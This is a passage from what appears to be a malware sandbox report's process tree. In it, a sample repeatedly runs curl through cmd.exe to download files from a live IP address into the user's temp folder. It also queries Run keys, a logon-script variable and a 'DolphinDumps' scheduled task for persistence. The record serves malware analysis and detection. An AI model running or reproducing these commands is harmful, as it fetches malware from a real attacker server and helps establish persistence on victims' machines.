        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\prgwk" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4580
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\prgwk" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1948
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ivwhg" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:968
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ivwhg" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4408
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ohggw" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3016
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ohggw" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2592
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3552
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2396
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:884
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4940
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3572
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oieyf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3748
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oieyf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jckeb" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1992
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jckeb" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3884
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ncbty" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2572
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ncbty" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1608
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4380
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4176
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:64
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:460
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1308
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oaduf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4124
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oaduf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:5068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ttufy" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:888
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ttufy" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3468
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\enkxv" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1444
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\enkxv" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3212
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:924
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2496
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3268
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2684
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xojnd" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2408
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xojnd" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3880
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jjdnn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:3492
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jjdnn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vhsyx" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4136
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vhsyx" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3036
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:552
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3356
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1892
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3460
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ohmjz" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4628
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ohmjz" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cnmbv" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:3444
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cnmbv" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ithxl" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:412
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ithxl" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3552
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:884
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3572
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1336
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fmsit" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4888
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fmsit" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\teuxp" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:2420
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\teuxp" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zgkhh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:800
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zgkhh" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:5008
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2536
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1840
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3104
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4108
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4468
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tmasi" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\tmasi" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4804
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oqyeo" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4600
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oqyeo" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3468
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kckcf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4764
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kckcf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3212
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4828
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2772
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1668
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3376
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2828
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rwrtq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4040
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rwrtq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2336
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wzype" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1392
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wzype" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cdrfo" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3532
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cdrfo" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3492
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3044
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3508
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1680
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2928
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2348
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xzlsc" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2008
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xzlsc" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ztdiu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:5064
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ztdiu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ggtjk" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3156
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ggtjk" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3444
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2304
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2020
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:408
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:5000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2640
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sxemc" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1588
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sxemc" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1616
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dohhn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3700
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dohhn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\depta" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4796
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\depta" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1532
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2988
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1036
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1840
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ltmwa" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:620
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ltmwa" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4124
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vfpfl" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vfpfl" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3228
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vephs" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4672
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vephs" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1012
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3008
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3624
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2872
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:932
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2412
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cazak" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3704
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cazak" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iljuc" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4088
      - C:\Windows\SysWOW64\curl.exe
        
